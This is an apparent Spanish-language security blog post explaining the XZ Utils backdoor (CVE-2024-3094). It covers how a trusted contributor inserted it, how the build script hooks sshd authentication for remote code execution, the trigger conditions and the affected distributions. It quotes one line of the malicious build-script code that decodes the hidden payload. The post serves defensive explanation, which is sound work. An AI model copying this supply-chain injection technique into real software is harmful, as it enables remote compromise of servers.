8 abr 2024

CVE-2024-3094 XZ Backdoor



Buenas a todos, en el artículo de hoy vamos a tratar un caso que se está discutiendo bastante en los últimos días y es la vulnerabilidad CVE-2024-3094 o como se le denomina comúnmente “backdoor en XZ”.

XZ Utils es una herramienta (open source) de compresión de datos presente en casi todas las distribuciones Linux, que sirve para comprimir formatos de archivos grandes en tamaños más pequeños y manejables para ser compartidos. Al ser un software de código abierto, es mantenido y actualizado por desarrolladores de manera liberal. 

Estas actualizaciones se añaden al proyecto mediante lo que se denominan “Pull Requests” y antes de ser admitidas, son revisadas por otros miembros del equipo que han contribuido al mismo con anterioridad a fin de evitar errores en el código fuente propuesto.

En este caso, un usuario de Github que contribuyó al proyecto de XZ, llamado Jia Tan logró obtener permisos para revisar y aceptar modificaciones de código, ganándose la confianza del resto del equipo y pudiendo aceptar sus propias contribuciones sin que estas fueran revisadas por otros miembros.

Con esta confianza depositada en su trabajo por los miembros del equipo, Jia incorporó código malicioso al proyecto de xz-utils, con la intención de hacer interferir la autenticación del servicio SSH y permitir una ejecución remota de código o RCE.

Explicación de la vulnerabilidad


explicación de la vulnerabilidad CVE-2024-3094 XZ Blackdoor


Todo nace cuando Andrés Freund, ingeniero de software en Microsoft, detecta un comportamiento inusual con el servicio sshd, el cual estaba consumiendo una alta cantidad de CPU.

Dentro del proceso de compilación de XZ, se ejecuta el script “Build-to-Host.m4”. Este script contiene la siguiente línea de código:

gl_[$1]config='sed "r\n" $gl_am_configmake | eval $gl_path_map | $gl[$1]_prefix -d 2>/dev/null'

La cual, inyecta un script obfuscado al final del script de configuración. Este script de configuracion es el responsable de crear los MakeFiles para xz-utils y liblzma.

El script tiene como objetivo principal modificar el MakeFile de liblzma en tiempo de ejecución, haciendo que el RSA_public_decrypt@....pl apunte al código malicioso de la backdoor.  

Durante el proceso de autenticación de sshd, se invoca a la función RSA_public_decrypt@....pl haciendo que se ejecute el código maliciosos del atacante al cual está apuntando. Este código es el encargado de extraer el payload de la clave pública que se le pasa durante el proceso de autenticación y la cual será sometida a una serie de pasos de verificación y controles de firma. Si pasa con éxito estas comprobaciones, se transfiere a la función system() de libc, que será la encargada de ejecutar el payload y llevar a cabo la ejecución remota de código (RCE).

El código ofuscado que se ejecuta dentro del script de configuración levanta un backdoor únicamente bajo ciertas condiciones:

1. El sistema operativo de destino debe ser Linux x86-64.

2. El proceso de compilación de XZ debe ser parte de la compilación de un paquete Debian o RPM.

3. El binario que se invoca debe estar en el path /usr/sbin/sshd

4. La variable de entorno TERM no debe estar configurada

5. Tampoco deben estarlo las variables LD_DEBUG y LD_PROFILE

6. La variable de entorno LANG debe estar seteada por defecto por sshd.

Distribuciones afectadas

  • Fedora 41 and Fedora Rawhide
  • Kali Linux actualizado entre el 26 y 29 de marzo
  • OpenSuse Tumbleweed
  • Alpine 5.6.0, 5.6.0-r0, 5.6.0-r1, 5.6.1, 5.6.1-r0 y 5.6.1-r1
  • Arch que tengan instalado las versiones de xz-utils 5.6.0 y 5.6.1

Además, para determinar si se ha instalado una versión de software de xz-utils vulnerable, se puede usar el script creado por el equipo JFrog, el cual se encuentra en el siguiente enlace.

Este checker es bastante sencillo, realiza las seis comprobaciones, que forman parte de las condiciones necesarias que hemos comentado anteriormente, para poder explotar esta vulnerabilidad. Os mostramos un ejemplo de uso:



¡Muchas gracias y hasta la próxima entrega!

Alejandro Auñón, Offensive Security Engineer at Zerolynx 
Justo Martín ,Consultor de Ciberseguridad en Zerolynx.


No hay comentarios:

Publicar un comentario